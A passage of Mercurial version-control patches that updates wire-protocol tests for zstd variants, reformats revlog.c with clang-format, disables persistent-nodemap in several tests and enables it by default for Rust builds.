\x9a\xf4\xd1}[\xfb{,q\x14Kf\x06\x1e\x10\xd6\x17\xbbl\x90\x16\xb9\xb3\xd8\x07\xee\xfc\xa8\x8eI\x10]\x9c\x1ava\x054W\xad\xdf\xb3\x18\xee\xbdd\x15\xdf$\x85St\n\xde\xee?\x91\xa0\x83\x11\x08\xd8\x01\x80\x10B\x04\x00\x04S\x04B\xc7Tw\x9f\xb9,\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (zstd !) b'' ] @@ -100,21 +106,26 @@ response: gen[ { b'filecount': 2, - b'totalsize': 1111 + b'totalsize': 1111 (no-zstd !) + b'totalsize': 1118 (zstd !) }, { b'location': b'store', b'path': b'00manifest.i', - b'size': 584 + b'size': 584 (no-zstd !) 
+ b'size': 588 (zstd !) }, - b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', + 
b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00I\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c\r\xca\xc1\x11\x00!\x08\x040\xdfV\x03+\xa2\x94\xb3\x8c\xd0\x7f\twy\x87\x03i\x95r\x96F6\xe5\x1c\x9a\x10-\x16\xba|\x07\xab\xe5\xd1\xf08s\\\x8d\xc2\xbeo)w\xa9\x8b;\xa2\xff\x95\x19\x02jB\xab\x0c\xea\xf3\x03\xcf\x1d\x16\t\x00\x00\x00\x00\x00I\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x80\x00\x00\x00\x00\x00\x8c\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xcd\xb9\rB1\x10\x00Q\xc7\xbf\x19\xf6\xb6\xdd\x08\xb9\xf7\x92H\xa9\x90\xd2\xb8\x82\xc9\x9e4c\x8c\xfb\xf8\xf7\xca\xc7\x13n16\x8a\x88\xb2\xd8\x818`\xb4=eF\xb9f\x17\xcc\x92\x94hR\xc0\xeb\xe7s(/\x02\xcb\xd8\x13K\tU m\t\x1f\xef\xb2D\x03\xa6\xb6\x14\xb2\xaf\xc7[\rw?\x16`\xce\xd0"\x9c,\xddK\xd0c/\rIX4\xc3\xbc\xe4\xef{ u\xcc\x8c\x9c\x93]\x0f\x9cM;\n\xb7\x12-X\x1c\x96\x9fuT\xc8\xf5\x06\x88\xa25W\x00\x00\x00\x00\x01\x0c\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (no-zstd !) 
+ b'\x00\x03\x00\x01\x00\x00\x00\x00\x00\x00\x00H\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff\x99/Gy\x02\x9a=\xf8\xd0fm\x00\xbb\x92OicN&A\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd V\xfd\x01\x00b\xc5\x0e\x0f\xc0\xd1\x00\xfb\x0c\xb9\xca\xdf\xb2R\xba!\xf2\xf6\x1d\x80\xd5\x95Yc\xef9DaT\xcefcM\xf1\x12\t\x84\xf3\x1a\x04\x04N\\\'S\xf2\'\x8cz5\xc5\x9f\xfa\x18\xf3\x82W\x1a\x83Y\xe8\xf0\x00\x00\x00\x00\x00\x00H\x00\x00\x00\x00\x007\x00\x00\x00V\x00\x00\x00\x00\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xff\xa9\x88\xfbCX>\x87\x1d\x1e\xd5u\x0e\xe0t\xc6\xd8@\xbb\xbf\xc8\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00+\x00\x00\x00+a\x009a38122997b3ac97be2a9aa2e556838341fdf2cc\n\x00\x00\x00\x00\x00\x7f\x00\x00\x00\x00\x00\x91\x00\x00\x01\x16\x00\x00\x00\x01\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xbcL\xdb}\x10{\xe2w\xaa\xdb"rC\xdf\xb3\xe0M\xd5,\x81\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd \xccE\x04\x00bK\x1e\x17\xb0A0\xff\xff\x9b\xb5V\x99\x99\xfa\xb6\xae\xf5n),"\xf1\n\x02\xb5\x07\x82++\xd1]T\x1b3\xaa\x8e\x10+)R\xa6\\\x9a\x10\xab+\xb4\x8bB\x9f\x13U\xd4\x98\xbd\xde \x9a\xf4\xd1}[\xfb{,q\x14Kf\x06\x1e\x10\xd6\x17\xbbl\x90\x16\xb9\xb3\xd8\x07\xee\xfc\xa8\x8eI\x10]\x9c\x1ava\x054W\xad\xdf\xb3\x18\xee\xbdd\x15\xdf$\x85St\n\xde\xee?\x91\xa0\x83\x11\x08\xd8\x01\x80\x10B\x04\x00\x04S\x04B\xc7Tw\x9f\xb9,\x00\x00\x00\x00\x01\x10\x00\x00\x00\x00\x00<\x00\x00\x01\x16\x00\x00\x00\x02\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x90#\x1d\xdc\xa3o\xa1x\xa0\xee\xd9\x9b\xd00x\x11$\x87\xdd\xa3\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xe6\x00\x00\x01\x16\x00\x00\x000dir1/f\x0028c776ae08d0d55eb40648b401b90ff54448348e\n', (zstd !) b'', { b'location': b'store', b'path': b'00changelog.i', - b'size': 527 + b'size': 527 (no-zstd !) + b'size': 530 (zstd !) 
}, - b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 
1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00N\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00x\x9c%\xc5\xc1\t\xc0 \x0c\x05\xd0{\xa6p\x03cjI\xd71\xf9\x11<H\xa1u\x7fJ\xf1]\x9eyu\x98\xa2\xb0Z\x88jk0\x11\x95z\xa0\xdb\x11\\\x81S\xfc*\xb4\xe2]\xc4\x89\t\xe3\xe1\xec;\xfc\x95\x1c\xbbN\xe4\xf7\x9cc%\xf9\x00S#\x19\x13\x00\x00\x00\x00\x00\xcc\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (no-zstd !) + b'\x00\x01\x00\x01\x00\x00\x00\x00\x00\x00\x00@\x00\x00\x00?\x00\x00\x00\x00\x00\x00\x00\x00\xff\xff\xff\xff\xff\xff\xff\xff3\x90\xef\x85\x00s\xfb\xc2\xf0\xdf\xff"D4,\x8e\x92)\x01:\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u992f4779029a3df8d0666d00bb924f69634e2641\ntest\n0 0\na\nb\n\ncommit 0\x00\x00\x00\x00\x00@\x00\x00\x00\x00\x00>\x00\x00\x00=\x00\x00\x00\x01\x00\x00\x00\x01\x00\x00\x00\x00\xff\xff\xff\xffD2\xd86&\xe8\xa9\x86U\xf0b\xec\x1f*C\xb0\x7f\x7f\xbb\xb0\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00ua988fb43583e871d1ed5750ee074c6d840bbbfc8\ntest\n0 0\na\n\ncommit 1\x00\x00\x00\x00\x00~\x00\x00\x00\x00\x00Q\x00\x00\x00W\x00\x00\x00\x02\x00\x00\x00\x02\x00\x00\x00\x01\xff\xff\xff\xff\xa4r\xd2\xea\x96U\x1a\x1e\xbb\x011-\xb2\xe6\xa7\x86\xd0F\x96o\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00(\xb5/\xfd WE\x02\x00r\x04\x0f\x14\x90\x01\x0e#\xf7h$;NQC%\xf8f\xd7\xb1\x81\x8d+\x01\x16+)5\xa8\x19\xdaA\xae\xe3\x00\xe9v\xe2l\x05v\x19\x11\xd4\xc1onK\xa2\x17c\xb4\xf3\xe7 
z\x13\x8f\x1c\xf3j4\x03\x03\x00`\x06\x84\x8b\x1a\n\x14\x00\x00\x00\x00\x00\xcf\x00\x00\x00\x00\x00C\x00\x00\x00B\x00\x00\x00\x03\x00\x00\x00\x03\x00\x00\x00\x02\xff\xff\xff\xff\x85kg{\x94a\x12i\xc5lW5[\x85\xf9\x95|\xfc\xc1\xb9\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00u90231ddca36fa178a0eed99bd03078112487dda3\ntest\n0 0\ndir1/f\n\ncommit 3', (zstd !) b'' ] diff --git a/tests/test-wireproto-exchangev2.t b/tests/test-wireproto-exchangev2.t --- a/tests/test-wireproto-exchangev2.t +++ b/tests/test-wireproto-exchangev2.t @@ -1099,7 +1099,8 @@ $ cat clone-output | grep "received frame" received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) - received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) + received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (no-zstd !) + received frame(size=1283; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (zstd !) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) @@ -1196,7 +1197,8 @@ $ cat clone-output | grep "received frame" received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) - received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) + received frame(size=1275; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (no-zstd !) 
+ received frame(size=1283; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) (zstd !) received frame(size=0; request=1; stream=2; streamflags=; type=command-response; flags=eos) received frame(size=9; request=1; stream=2; streamflags=stream-begin; type=stream-settings; flags=eos) received frame(size=11; request=1; stream=2; streamflags=encoded; type=command-response; flags=continuation) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617905159 -7200 # Thu Apr 08 20:05:59 2021 +0200 # Node ID 651e6df2b0a45d39d7605aaf65a893318ca68d0c # Parent 84a93fa7ecfd9e6509d08824e2d11831e582a2fd clang-format: run the formatter on mercurial/cext/revlog.c This fix `test-check-clang-format.t` that has been complaining for a while. Differential Revision: https://phab.mercurial-scm.org/D10327 diff --git a/mercurial/cext/revlog.c b/mercurial/cext/revlog.c --- a/mercurial/cext/revlog.c +++ b/mercurial/cext/revlog.c @@ -115,12 +115,10 @@ #if LONG_MAX == 0x7fffffffL static const char *const v1_tuple_format = PY23("Kiiiiiis#", "Kiiiiiiy#"); -static const char *const v2_tuple_format = - PY23("Kiiiiiis#Ki", "Kiiiiiiy#Ki"); +static const char *const v2_tuple_format = PY23("Kiiiiiis#Ki", "Kiiiiiiy#Ki"); #else static const char *const v1_tuple_format = PY23("kiiiiiis#", "kiiiiiiy#"); -static const char *const v2_tuple_format = - PY23("kiiiiiis#ki", "kiiiiiiy#ki"); +static const char *const v2_tuple_format = PY23("kiiiiiis#ki", "kiiiiiiy#ki"); #endif /* A RevlogNG v1 index entry is 64 bytes long. 
*/ @@ -407,10 +405,11 @@ return NULL; } } else { - if (!PyArg_ParseTuple( - obj, v2_tuple_format, &offset_flags, &comp_len, - &uncomp_len, &base_rev, &link_rev, &parent_1, &parent_2, - &c_node_id, &c_node_id_len, &sidedata_offset, &sidedata_comp_len)) { + if (!PyArg_ParseTuple(obj, v2_tuple_format, &offset_flags, + &comp_len, &uncomp_len, &base_rev, + &link_rev, &parent_1, &parent_2, + &c_node_id, &c_node_id_len, + &sidedata_offset, &sidedata_comp_len)) { PyErr_SetString(PyExc_TypeError, "10-tuple required"); return NULL; } @@ -467,11 +466,11 @@ int rev; Py_ssize_t sidedata_comp_len; char *data; - #if LONG_MAX == 0x7fffffffL - const char *const sidedata_format = PY23("nKi", "nKi"); - #else - const char *const sidedata_format = PY23("nki", "nki"); - #endif +#if LONG_MAX == 0x7fffffffL + const char *const sidedata_format = PY23("nKi", "nKi"); +#else + const char *const sidedata_format = PY23("nki", "nki"); +#endif if (self->hdrsize == v1_hdrsize || self->inlined) { /* @@ -499,12 +498,12 @@ return NULL; } - /* Find the newly added node, offset from the "already on-disk" length */ + /* Find the newly added node, offset from the "already on-disk" length + */ data = self->added + self->hdrsize * (rev - self->length); putbe64(sidedata_offset, data + 64); putbe32(sidedata_comp_len, data + 72); - Py_RETURN_NONE; } @@ -2724,9 +2723,9 @@ Py_BuildValue(PY23("iiiiiiis#", "iiiiiiiy#"), 0, 0, 0, -1, -1, -1, -1, nullid, self->nodelen); } else { - self->nullentry = Py_BuildValue( - PY23("iiiiiiis#ii", "iiiiiiiy#ii"), 0, 0, 0, -1, -1, -1, - -1, nullid, self->nodelen, 0, 0); + self->nullentry = + Py_BuildValue(PY23("iiiiiiis#ii", "iiiiiiiy#ii"), 0, 0, 0, + -1, -1, -1, -1, nullid, self->nodelen, 0, 0); } if (!self->nullentry) # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617930907 -7200 # Fri Apr 09 03:15:07 2021 +0200 # Node ID a8fa270a0e86d3b1bbf1398734a9b6eb86b6c165 # Parent 651e6df2b0a45d39d7605aaf65a893318ca68d0c persistent-nodemap: disable 
it unconditionally for test-http-bad-server.t This is not relevant for the test and this will avoid a lot of variations Differential Revision: https://phab.mercurial-scm.org/D10331 diff --git a/tests/test-http-bad-server.t b/tests/test-http-bad-server.t --- a/tests/test-http-bad-server.t +++ b/tests/test-http-bad-server.t @@ -13,6 +13,7 @@ > fakeversion = `pwd`/fakeversion.py > [format] > sparse-revlog = no + > use-persistent-nodemap = no > [devel] > legacy.exchange = phases > [server] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617932685 -7200 # Fri Apr 09 03:44:45 2021 +0200 # Node ID 1a85c5d75d53b0ec8b348c4dd2e5025d6d210ede # Parent a8fa270a0e86d3b1bbf1398734a9b6eb86b6c165 persistent-nodemap: disable it unconditionally for test-http-protocol.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10332 diff --git a/tests/test-http-protocol.t b/tests/test-http-protocol.t --- a/tests/test-http-protocol.t +++ b/tests/test-http-protocol.t @@ -1,8 +1,13 @@ #require no-chg +persistent-nodemap is not enabled by default. It is not relevant for this test +so disable it. + $ . $TESTDIR/wireprotohelpers.sh $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no > [web] > push_ssl = false > allow_push = * # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617934387 -7200 # Fri Apr 09 04:13:07 2021 +0200 # Node ID f8f738c24d2f836b3f2148b2dfde9f7c1ae15d3c # Parent 1a85c5d75d53b0ec8b348c4dd2e5025d6d210ede persistent-nodemap: disable it unconditionally for test-share-safe.t This is not relevant for the test and this will avoid a lot of variations. 
Differential Revision: https://phab.mercurial-scm.org/D10333 diff --git a/tests/test-share-safe.t b/tests/test-share-safe.t --- a/tests/test-share-safe.t +++ b/tests/test-share-safe.t @@ -10,6 +10,8 @@ > # enforce zlib to ensure we can upgrade to zstd later > [format] > revlog-compression=zlib + > # we want to be able to enable it later + > use-persistent-nodemap=no > EOF prepare source repo # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617933095 -7200 # Fri Apr 09 03:51:35 2021 +0200 # Node ID a0d152e5ac17e7e068e0feed7d843bb1bc34172a # Parent f8f738c24d2f836b3f2148b2dfde9f7c1ae15d3c persistent-nodemap: disable it unconditionally for test-ssh-proto.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10334 diff --git a/tests/test-ssh-proto.t b/tests/test-ssh-proto.t --- a/tests/test-ssh-proto.t +++ b/tests/test-ssh-proto.t @@ -1,5 +1,12 @@ #require no-chg +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + + $ cat << EOF >> $HGRCPATH + > [format] + > use-persistent-nodemap = no + > EOF + $ cat > hgrc-sshv2 << EOF > %include $HGRCPATH > [experimental] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617933085 -7200 # Fri Apr 09 03:51:25 2021 +0200 # Node ID 8bf21b3869cd68f7519f468aa454d728ccba3a3d # Parent a0d152e5ac17e7e068e0feed7d843bb1bc34172a persistent-nodemap: disable it unconditionally for test-ssh-proto-unbundle.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10335 diff --git a/tests/test-ssh-proto-unbundle.t b/tests/test-ssh-proto-unbundle.t --- a/tests/test-ssh-proto-unbundle.t +++ b/tests/test-ssh-proto-unbundle.t @@ -1,3 +1,10 @@ +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. 
+ + $ cat << EOF >> $HGRCPATH + > [format] + > use-persistent-nodemap = no + > EOF + $ cat > hgrc-sshv2 << EOF > %include $HGRCPATH > [experimental] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617932167 -7200 # Fri Apr 09 03:36:07 2021 +0200 # Node ID 06ebf0cc4f70241edb24500582167e1ec8a3d249 # Parent 8bf21b3869cd68f7519f468aa454d728ccba3a3d persistent-nodemap: disable it unconditionally for test-wireproto-caching.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10336 diff --git a/tests/test-wireproto-caching.t b/tests/test-wireproto-caching.t --- a/tests/test-wireproto-caching.t +++ b/tests/test-wireproto-caching.t @@ -1,5 +1,10 @@ $ . $TESTDIR/wireprotohelpers.sh + +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no > [extensions] > blackbox = > [blackbox] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617931818 -7200 # Fri Apr 09 03:30:18 2021 +0200 # Node ID 1b98c95720523ad7848431458309d39251397665 # Parent 06ebf0cc4f70241edb24500582167e1ec8a3d249 persistent-nodemap: disable it for test-wireproto-command-capabilities.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10337 diff --git a/tests/test-wireproto-command-capabilities.t b/tests/test-wireproto-command-capabilities.t --- a/tests/test-wireproto-command-capabilities.t +++ b/tests/test-wireproto-command-capabilities.t @@ -2,6 +2,13 @@ $ . $TESTDIR/wireprotohelpers.sh +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + + $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no + > EOF + $ hg init server zstd isn't present in plain builds. 
Make tests easier by removing # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1617932184 -7200 # Fri Apr 09 03:36:24 2021 +0200 # Node ID df76da69f5b1ff854f72f4d0d1c8e624138d8073 # Parent 1b98c95720523ad7848431458309d39251397665 persistent-nodemap: disable it for test-wireproto-content-redirects.t This is not relevant for the test and this will avoid a lot of variations. Differential Revision: https://phab.mercurial-scm.org/D10338 diff --git a/tests/test-wireproto-content-redirects.t b/tests/test-wireproto-content-redirects.t --- a/tests/test-wireproto-content-redirects.t +++ b/tests/test-wireproto-content-redirects.t @@ -1,6 +1,10 @@ $ . $TESTDIR/wireprotohelpers.sh +persistent-nodemap is not enabled by default. It is not relevant for this test so disable it. + $ cat >> $HGRCPATH << EOF + > [format] + > use-persistent-nodemap = no > [extensions] > blackbox = > [blackbox] # HG changeset patch # User Pierre-Yves David <pierre-yves.david@octobus.net> # Date 1610596700 -3600 # Thu Jan 14 04:58:20 2021 +0100 # Node ID cc3ad5c3af3bfabcaaacd2b4cc38cf865bc5be07 # Parent df76da69f5b1ff854f72f4d0d1c8e624138d8073 persistent-nodemap: enable the feature by default when using Rust As discussed at the 5.6 sprint, we can make it enabled by default, but only for Rust installation. Differential Revision: https://phab.mercurial-scm.org/D9765 diff --git a/mercurial/configitems.py b/mercurial/configitems.py --- a/mercurial/configitems.py +++ b/mercurial/configitems.py @@ -1325,10 +1325,22 @@ b'usestore', default=True, ) + + +def _persistent_nodemap_default(): + """compute `use-persistent-nodemap` default value + + The feature is disabled unless a fast implementation is available. + """ + from . 
import policy + + return policy.importrust('revlog') is not None + + coreconfigitem( b'format', b'use-persistent-nodemap', - default=False, + default=_persistent_nodemap_default, ) # TODO needs to grow a docket file to at least store the last offset of the data # file when rewriting sidedata. diff --git a/mercurial/helptext/config.txt b/mercurial/helptext/config.txt --- a/mercurial/helptext/config.txt +++ b/mercurial/helptext/config.txt @@ -910,7 +910,8 @@ Repository with this on-disk format require Mercurial version 5.4 or above. - Disabled by default. + By default this format variant is disabled if fast implementation is not + available and enabled by default if the fast implementation is available. ``use-share-safe`` Enforce "safe" behaviors for all "shares" that access this repository. diff --git a/tests/test-bundle.t b/tests/test-bundle.t --- a/tests/test-bundle.t +++ b/tests/test-bundle.t @@ -297,19 +297,27 @@ $ hg -R test debugcreatestreamclonebundle packed.hg writing 2664 bytes for 6 files (no-zstd !) writing 2665 bytes for 6 files (zstd !) - bundle requirements: generaldelta, revlogv1, sparserevlog + bundle requirements: generaldelta, revlogv1, sparserevlog (no-rust !) + bundle requirements: generaldelta, persistent-nodemap, revlogv1, sparserevlog (rust !) $ f -B 64 --size --sha1 --hexdump packed.hg packed.hg: size=2840, sha1=12bf3eee3eb8a04c503ce2d29b48f0135c7edff5 (no-zstd !) - packed.hg: size=2841, sha1=8b645a65f49b0ae43042a9f3da56d4bfdf1c7f99 (zstd !) + packed.hg: size=2841, sha1=8b645a65f49b0ae43042a9f3da56d4bfdf1c7f99 (zstd no-rust !) + packed.hg: size=2860, sha1=81d7a2e535892cda51e82c200f818de2cca828d3 (rust !) 0000: 48 47 53 31 55 4e 00 00 00 00 00 00 00 